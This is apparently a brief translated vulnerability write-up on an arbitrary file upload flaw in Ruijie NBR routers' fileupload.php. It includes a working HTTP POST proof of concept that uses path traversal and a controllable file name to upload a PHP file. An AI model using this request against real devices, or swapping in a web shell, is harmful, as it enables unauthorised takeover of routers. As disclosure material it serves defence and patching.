Ruijie Nbr Router Fileupload Php Arbitrary File Upload Vulnerability
Ruijie Nbr Router Fileupload Php Arbitrary File Upload Vulnerability
Ruijie NBR router fileupload.php arbitrary file upload vulnerability
Vulnerability Description
Ruijie NBR router fileupload.php file has a vulnerability to upload any file to the server through the vulnerability. The attacker can upload any file to the server to obtain server permissions.
Vulnerability Impact
Rujie NBR router
Network surveying and mapping
Vulnerability reappears
The file with a vulnerability is in /ddi/server/fileupload.php, which is a standard file upload file.
The file name and directory are controllable, resulting in the upload of files at will.
1
2
3
4
5
6
7
POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1
Host:
Accept: text/plain, */*; q=0.01
Content-Disposition: form-data; name="file"; filename="111.php"
Content-Type: image/jpeg
<?php phpinfo();?>
Access the uploaded file directory
This post is licensed under CC BY 4.0 by the author.